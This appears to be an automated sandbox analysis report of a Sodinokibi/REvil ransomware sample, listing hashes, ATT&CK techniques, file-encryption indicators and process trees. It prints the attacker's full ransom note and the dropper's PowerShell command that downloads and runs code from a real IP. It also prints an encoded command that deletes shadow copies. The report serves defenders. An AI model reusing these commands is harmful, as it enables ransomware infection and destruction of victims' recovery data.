sodinokibi | add2d6d1bb4a21cb6e1b3266aea269d4e66dbd7999ef070b81760cc64d547bac

General

Target

f273d69e572f51a031e40b8c83f3e58b.bat
Size

222B
MD5

8609a1469584fe2c96aa61c898fd08e2
SHA1

184957747a301ae172a76046daf5480c525a55db
SHA256

add2d6d1bb4a21cb6e1b3266aea269d4e66dbd7999ef070b81760cc64d547bac
SHA512

2192354833c5c0c07ad79980769ef1090d7232717f9c73c13f16b4558593a9eb3028818dbc564433a41bfc3f092ea1a39cffccf0440a81dbc09ab8f5114162ec

Score

10^/10

ransomware persistence sodinokibi

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/f273d69e572f51a031e40b8c83f3e58b

Extracted

Path

C:\3333t-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 3333t. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). We have copied financial files and other important information about personal data, it will be published on the Internet or will be used against you if you do not pay us, so if you do not want such consequences as customer churn, media coverage, fines like GDRP and other damages, we recommend you to contact us and pay the ransom. [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/75209EA47D1D4065 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/75209EA47D1D4065 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: ddP/eoL4Uxiu392fEnG55s4iQU9tmTeYMMSKrKQcy5XlhFH+xyOYpN3CXIBXUFWi xFvDNnFXKHb1tq/SzAe4VlWUpFh31eGaU8/w5iktwUVsHkf5j5E3DeC9Aw7opqLb aW0gWzxFLQmZ6idEjz3ggQSy6D0ETK5ceX0EcLtBZtl6sl7VYgvw+oaROj2NuMl+ 1555KfCPL0J0jyJ4r55j0sYIq7HaTMhODCiBL9DHdYhgn93FiS4yCCYey20lWKeI /GJ2Fsu6kSyDa8t1CA8PFsvRQXrvL4Y9CNks0H5SMePn9iIJCC9f9BT0XUTuILZP Sre6RW9t+1XuKn4dxx8aqO81VvZJnBP8fmD66vrdd2hBnC4pLgKA1ciTlu8RZRZ0 cWsEcgSkWaLXXGu95EXEREd773LjexMrjfRGO3Rygftzzq/NYatZLpf1qT8hyi3o tcTU/Lu5STYpPNaTF74lpEevEiAClNILdgXRUauPmD+bZk2oXhVK/dbtHUHpH+rM M982RZD/qBL5xb18DyPlRcRKc2dC6I+EvEM/sfEDMRmqwrX1TiTD6ukAbaCVvqwm fnz1pznynIcrOi26DG8NzVzIGu2jgFiRDxFWDpzA/wykJXl9wZc1qG5ZjcUHFgyp iLDkubUScTTf6Cnm6Pbln1tyFU+n7CcqcFQzFo6zLr8zaBxjOOW2BgOfwc96isII wU8jqi1WoCxn/vg9EzwcQFqr6/cW6hX+Cgy/s+TcalnFTRTakVM0DxtrpTxOUnH5 InlHY4nrn8NiuqeecmJJSiHxVoqrRS5n0WWska4X0b1L2xLhkRB/CqxOovUuFRaG zhmp2vJ2oN2+Dfu5tPxHd0tnwr9wzjjh+rXHQBJlMpGbTaR0B6ukJXPcdEy5EQCW gKJFSCSdgoJ03Wy5OUwvb8yC6vDnYXmzmukQfcseMKTsVk9hMYt/l38lBBSVtN1v Eca7HhogbJCrr9ZHcFLLAnZXFPsz7aeGD+VDiWqSuguea6w08ax1S1tvBLtKiTQ+ OjwcDDfnbEGZMcyy2lrXgGoUsOyv3u7uDgvTDE2UYMCRaEBZ02aHcf21kOHNrwgF N66RPmNEughe9cpXL5zMRiUSjvh9P3ns6UdoGuqc+XLG71YlhfGJnMXh7qgnojkX HP5rbuIlSasEsaqfC+Je5/DdC67RXyTvnyX+jZm2tlW8ybZlKrt3/LI8VZhR5V5o XMa5IvTZlbAL6IdVZx/IPUpV7TPz3eefIHtSmKVj9CSfakGXJIjACXpvKFmpXPp4 LaT6HU5ak651KbjcCU6YmfLlapNZorrQjJR38FXa ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/75209EA47D1D4065

http://decryptor.cc/75209EA47D1D4065

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 1040 powershell.exe

flow	pid	process
3	1040	powershell.exe

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\RegisterDisconnect.tiff => \??\c:\users\admin\pictures\RegisterDisconnect.tiff.3333t	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\RegisterDisconnect.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\ApproveConvertFrom.crw => \??\c:\users\admin\pictures\ApproveConvertFrom.crw.3333t	powershell.exe
File renamed	C:\Users\Admin\Pictures\DebugTest.tif => \??\c:\users\admin\pictures\DebugTest.tif.3333t	powershell.exe
File renamed	C:\Users\Admin\Pictures\ExpandSearch.crw => \??\c:\users\admin\pictures\ExpandSearch.crw.3333t	powershell.exe
File renamed	C:\Users\Admin\Pictures\ConvertFromFind.png => \??\c:\users\admin\pictures\ConvertFromFind.png.3333t	powershell.exe
File renamed	C:\Users\Admin\Pictures\EditFind.crw => \??\c:\users\admin\pictures\EditFind.crw.3333t	powershell.exe
File renamed	C:\Users\Admin\Pictures\ImportCompress.png => \??\c:\users\admin\pictures\ImportCompress.png.3333t	powershell.exe
File renamed	C:\Users\Admin\Pictures\StopRegister.crw => \??\c:\users\admin\pictures\StopRegister.crw.3333t	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\fts503.bmp"	powershell.exe

Drops file in Program Files directory 38 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\NewPublish.aiff	powershell.exe
File opened for modification	\??\c:\program files\ResolveSkip.mht	powershell.exe
File opened for modification	\??\c:\program files\UnlockInstall.midi	powershell.exe
File created	\??\c:\program files\3333t-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ClearMerge.svgz	powershell.exe
File opened for modification	\??\c:\program files\LockEnable.xla	powershell.exe
File opened for modification	\??\c:\program files\LimitGroup.avi	powershell.exe
File opened for modification	\??\c:\program files\LimitUnprotect.wm	powershell.exe
File opened for modification	\??\c:\program files\MoveConvert.tiff	powershell.exe
File opened for modification	\??\c:\program files\SyncComplete.wmx	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\3333t-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\AddConvertTo.potx	powershell.exe
File opened for modification	\??\c:\program files\ExpandOut.3g2	powershell.exe
File opened for modification	\??\c:\program files\ImportExit.m3u	powershell.exe
File opened for modification	\??\c:\program files\HideSend.wm	powershell.exe
File opened for modification	\??\c:\program files\MergeDebug.clr	powershell.exe
File opened for modification	\??\c:\program files\OpenConvertTo.xlsb	powershell.exe
File opened for modification	\??\c:\program files\ResumeUnpublish.jpeg	powershell.exe
File opened for modification	\??\c:\program files\ConvertResolve.emz	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\3333t-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\MountSave.wax	powershell.exe
File opened for modification	\??\c:\program files\ReceiveClose.WTV	powershell.exe
File opened for modification	\??\c:\program files\UnregisterRestore.mhtml	powershell.exe
File opened for modification	\??\c:\program files\StepApprove.txt	powershell.exe
File opened for modification	\??\c:\program files\ApproveSuspend.vsd	powershell.exe
File opened for modification	\??\c:\program files\ConvertToSplit.i64	powershell.exe
File opened for modification	\??\c:\program files\SplitExport.edrwx	powershell.exe
File opened for modification	\??\c:\program files\ReceiveEnter.wpl	powershell.exe
File opened for modification	\??\c:\program files\SaveWatch.vbe	powershell.exe
File opened for modification	\??\c:\program files\SetSync.search-ms	powershell.exe
File opened for modification	\??\c:\program files\StepOut.xlsx	powershell.exe
File opened for modification	\??\c:\program files\TestAssert.pptm	powershell.exe
File created	\??\c:\program files (x86)\3333t-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\CheckpointResize.xml	powershell.exe
File opened for modification	\??\c:\program files\OpenMerge.contact	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\3333t-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\FormatCompress.ttf	powershell.exe
File opened for modification	\??\c:\program files\PushBackup.php	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

1040 powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

1040 powershell.exe
1040 powershell.exe
1040 powershell.exe
1352 powershell.exe
1352 powershell.exe

pid	process
1040	powershell.exe

pid	process
1040	powershell.exe
1040	powershell.exe
1040	powershell.exe
1352	powershell.exe
1352	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeBackupPrivilege	1372	vssvc.exe
Token: SeRestorePrivilege	1372	vssvc.exe
Token: SeAuditPrivilege	1372	vssvc.exe
Token: SeTakeOwnershipPrivilege	1040	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 748 wrote to memory of 1040	748	cmd.exe	powershell.exe
PID 748 wrote to memory of 1040	748	cmd.exe	powershell.exe
PID 748 wrote to memory of 1040	748	cmd.exe	powershell.exe
PID 748 wrote to memory of 1040	748	cmd.exe	powershell.exe
PID 1040 wrote to memory of 1352	1040	powershell.exe	powershell.exe
PID 1040 wrote to memory of 1352	1040	powershell.exe	powershell.exe
PID 1040 wrote to memory of 1352	1040	powershell.exe	powershell.exe
PID 1040 wrote to memory of 1352	1040	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\f273d69e572f51a031e40b8c83f3e58b.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:748

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/f273d69e572f51a031e40b8c83f3e58b');Invoke-QEEAWDOACTLVWYR;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1040

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1372

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit
memory/1040-5-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/1040-8-0x0000000005600000-0x0000000005601000-memory.dmp

Filesize
4KB

Download
memory/1040-22-0x0000000006330000-0x0000000006331000-memory.dmp

Filesize
4KB

Download
memory/1040-38-0x00000000091C0000-0x0000000009545000-memory.dmp

Filesize
3.5MB

Download
memory/1040-14-0x0000000006130000-0x0000000006131000-memory.dmp

Filesize
4KB

Download
memory/1040-1-0x0000000073F90000-0x000000007467E000-memory.dmp

Filesize
6.9MB

Download
memory/1040-13-0x0000000005700000-0x0000000005701000-memory.dmp

Filesize
4KB

Download
memory/1040-21-0x0000000006250000-0x0000000006251000-memory.dmp

Filesize
4KB

Download
memory/1040-0-0x0000000000000000-mapping.dmp

Download
memory/1040-4-0x0000000002450000-0x0000000002451000-memory.dmp

Filesize
4KB

Download
memory/1040-3-0x0000000004800000-0x0000000004801000-memory.dmp

Filesize
4KB

Download
memory/1040-2-0x00000000007E0000-0x00000000007E1000-memory.dmp

Filesize
4KB

Download
memory/1352-25-0x0000000073F90000-0x000000007467E000-memory.dmp

Filesize
6.9MB

Download
memory/1352-23-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads